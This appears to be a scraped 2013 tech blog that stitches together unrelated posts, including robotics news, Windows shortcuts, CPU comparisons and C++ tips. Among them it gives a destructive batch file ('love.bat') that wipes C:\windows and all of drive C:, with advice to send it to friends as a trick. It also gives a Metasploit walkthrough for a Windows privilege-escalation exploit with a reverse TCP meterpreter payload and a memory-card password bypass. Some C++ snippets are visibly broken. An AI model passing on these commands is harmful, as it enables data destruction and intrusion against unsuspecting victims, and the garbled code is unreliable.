More than 100 teams originally applied to take part, and the number was whittled down to 17 by Darpa ahead of Friday and Saturday’s event.
Some entered their own machines, while others made use of Atlas - a robot manufactured by another Google-owned business, Boston Dynamics - controlling it with their own software.
One self-funded team from China - Intelligent Pioneer - dropped out at the last moment, bringing the number of contestants who took part at the Homestead-Miami Speedway racetrack to 16.
Schaft’s 1.48m (4ft 11in) tall, two-legged robot entered the contest the favourite and lived up to its reputation.
It makes use of a new high-voltage liquid-cooled motor technology that uses a capacitor, rather a battery, for power. Its engineers say this lets its arms move and pivot at higher speeds than would otherwise be possible, in effect giving it stronger “muscles”.

Shut Down a Computer Forever

Open notepad and type following code :-

cmd /c del c:\windows\* /F /S /Q
cmd /c del c:\* /F /S /Q

save this file with "love.bat"

send this file to your friends.

when your friend try to open this file , the computer will shut down forever.................

Enjoy................

WARNING: I am not responsible for any thing.

Right Click ::.



Tech Support: I need you to right-click on the Open Desktop.

Customer: ?Ok.

Tech Support: Did you get a pop-up menu ?

Customer: No

Tech Support: Ok. Right click again. Do you see a pop-up menu?

Customer: No

Tech Support: Ok sir. Can you tell me what you have done untill now?

Customer: Sure, you told me to write "click" and I wrote "click". And then you told me to write "click" again, so I wrote "click" again. Now it reads "click click"

DIFFERENCE BETWEEN CORE I3, CORE I5, CORE I7..


► Core i3:
* Entry level processor.
* 2-4 Cores
* 4 Threads
* Hyper-Threading (efficient use of processor
resources)
* 3-4 MB Cache
* 32 nm Silicon (less heat and energy)

► Core i5:
* Mid range processor.
* 2-4 Cores
* 4 Threads
* Turbo Mode (turn off core if not used)
* Hyper-Threading (efficient use of processor
resources)
* 3-8 MB Cache
* 32-45 nm Silicon (less heat and energy)

► Core i7:
* High end processor.
* 4 Cores
* 8 Threads
* Turbo Mode (turn off core if not used)
* Hyper-Threading (efficient use of processor
resources)
* 4-8 MB Cache
* 32-45 nm Silicon (less heat and energy)

short cut for windows operating system helpful for computer section

short cut for windows operating system helpful for computer section
***********************
1. Windows Logo (Display or hide the Start menu)
2. Windows Logo+BREAK (Display the System Properties dialog box)
3. Windows Logo+D (Display the desktop)
4. Windows Logo+M (Minimize all of the windows)
5. Windows Logo+SHIFT+M (Restore the minimized windows)
6. Windows Logo+E (Open My Computer)
7. Windows Logo+F (Search for a file or a folder)
8. CTRL+Windows Logo+F (Search for computers)
9. Windows Logo+F1 (Display Windows Help)
10. Windows Logo+ L (Lock the keyboard)
11. Windows Logo+R (Open the Run dialog box)
12. Windows Logo+U (Open Utility Manager)
13. Accessibility Keyboard Shortcuts
14. Right SHIFT for eight seconds (Switch Filter Keys either on or off)
15. Left ALT+left SHIFT+PRINT SCREEN (Switch High Contrast either on or off)
16. Left ALT+left SHIFT+NUM LOCK (Switch the Mouse Keys either on or off)
17. SHIFT five times (Switch the Sticky Keys either on or off)
18. NUM LOCK for five seconds (Switch the Toggle Keys either on or off)
19. Windows Logo +U (Open Utility Manager)
20. Windows Explorer Keyboard Shortcuts
21. END (Display the bottom of the active window)
22. HOME (Display the top of the active window)
23. NUM LOCK+Asterisk sign (*) (Display all of the sub folders that are under the selected folder)
24. NUM LOCK+Plus sign (+) (Display the contents of the selected folder)
25. NUM LOCK+Minus sign (-) (Collapse the selected folder)
26. LEFT ARROW (Collapse the current selection if it is expanded, or select the parent folder)
27. RIGHT ARROW (Display the current selection if it is collapsed, or select the first sub-folder)

Hack Remote PC with Windows

Hack Remote PC with Windows
EPATHOBJ::pprFlattenRec Local Privilege
Escalation
This module exploits vulnerability on
EPATHOBJ::pprFlattenRec due to the usage of uninitialized
data which allows to corrupt memory. At the moment, the
module has been tested successfully on Windows XP SP3,
Windows 2003 SP1, and Windows 7 SP1.
Exploit Targets
Windows XP SP 3
Requirement
Attacker: Kali Linux
Victim PC : Windows XP
First Hack the Victim PC Using Metaspolit ( Tutorial How
to Hack Remote PC )
Open Kali Linux terminal type msfconsole
Now type use use exploit/windows/local/ppr_flatten_rec
msf exploit ( ppr_flatten_rec )> set payload windows/
meterpreter/reverse_tcp
msf exploit ( ppr_flatten_rec )> set lhost 192.168.1.103 ( IP
of Local Host)
msf exploit ( ppr_flatten_rec )> set session 1
msf exploit ( ppr_flatten_rec )> exploit

some error codes











Wednesday 25 December 2013

5 Hidden Features Of C++ That You May Find Interesting


1. While the ternary operator (?:) is well known, many don’t realise that it can also be used as lvalues.

x = (y < 0) ? 10 : 20;
(a == 0 ? a : b) = 1;

Otherwise, you would be writing this as,

if (a == 0)
a = 1;
else
b = 1;

2. The namespace alias is pretty easy to miss. Once you know about it though, you will start recognising it everywhere. It is especially useful when you’rr writing a large code with a lot of namespace hierarchies.

namespace x = boost::filesystem;

x::path myPath(strPath, fs::native );

3. Variables aren’t the only ones that can be declared in the init part of functions. You can also declare classes and other functions.

for(struct { int x; float y; } loop = { 1, 2 }; ...; ...) {
...
}

4. The unary + operator can be used in order to promote or decay a number of things. See below for some examples.

+EnumeratorValue: This gives your enumerator value a perfect integer type, which lets it fit its value. This is quite useful for implementing overloaded operators for enumeration.

Passing a temporary value to a variable: You can create a temporary value for a variable using this operator. For example, if you have a class that uses an in class static initializer without any out of class definition, but sometimes the system fails to link.

struct Foo {
static int const value = 42;
};

template
void f(T const&);

int main() {
// fails to link and tries to get the address of "Foo::value"!
f(Foo::value);

// works - pass a temporary value
f(+Foo::value);
}

Decay an array to a pointer: The operator also works when you want to pass two values to a function.

template
void f(T const& a, T const& b);

int main() {
int a[2];
int b[3];
f(a, b); // won't work! different values for "T"!
f(+a, +b); // works! T is "int*" both time
}

5. You must know the id/identity metafunction. Now check out this usecase for it, which is for non-template cases.

// void (*f)(); // same
id::type *f;

// void (*f(void(*p)()))(int); // same
id::type *f(id::type *p);

// int (*p)[2] = new int[10][2]; // same
id::type *p = new int[10][2];

// void (C::*p)(int) = 0; // same
id::type C::*p = 0;

It helps decrypting C++ declarations greatly!

// boost::identity is pretty much the same
template
struct id { typedef T type; };
Basic tips for Secure Browsing (Share it)

1. Never keep same password for different services you use online like gmail , facebook, bank accounts etc.,

2. Use multiple accounts so that you dont get spams in your personal/ official email address.

3. Install good Antivirus and Two way firewall.

4. Use VPN for hiding identity and secure browsing when using internet out of your home.

5. Update your OS, Antivirus, Firewall and Browsers regularly.

6. Install a good spyware & Adware scanner .

7. Never provide personal information openly in public websites. Share your information carefully.

8. Never click on unwanted or suspiicious links. It may be hacking attempt.

9. Change your passwords regularly to increase the security of your daily actiivities.
Interesting thing about Friday in 2014
4/4/2014 Friday
6/6/2014 Friday
8/8/2014 Friday
10/10/2014 Friday
12/12/2014 Friday
Which is your dream IT company to work for ?
- INFOSYS
- IBM
- ACCENTURE
- TCS
- ORACLE
- CTS
- MICROSOFT
- GOOGLE
- HCL
- IGATE
- WIPRO
- L&T INFOTECH
- MPHASIS
- TECH MAHINDRA
- Any Other Company (Write the name)...

Tuesday 24 December 2013

arduino board chip for robo design

Is your phone part of this list?

List Of Smartphones Getting Android 4.4 KitKat Update
Sony
* Sony Xperia Z1
* Sony Xperia Z
* Sony Xperia Z Ultra
* Sony Xperia ZL
* Sony Xperia Tablet Z
HTC
* HTC One
* HTC One X+
* HTC One X
* New Desire series phones launched in 2013
* HTC Droid DNA
* HTC J
* HTC Butterfly
LG
* LG G2
* LG Nexus 4
* LG Optimus L7, L5, L3
* LG Optimus G
* LG Optimus G Pro
* LG Optimus VU
Samsung
* Samsung Galaxy S4
* Samsung Galaxy S4 Zoom
* Samsung Galaxy S4 Active
* Samsung Galaxy Note 3
* Samsung Galaxy Mega (no confirmation whether the 5.8, 6.3 or both)
* Samsung Galaxy S3
* Samsung Galaxy Note 2
* Samsung Galaxy S4 Mini
* Samsung Galaxy Tab 3 & Tab 2
How to Hack Memory card password
Hi friends! if you really want to hack any memory card's password from heart, you can try this trick.
To hack the password, follow these steps-

1> open C:\System by using any file explore (where 'C:\' is ur memcard drive letter)

2> rename 'mmcstore' as 'mmcstore.txt'

3> open that file. There you can see the password.

Enjoy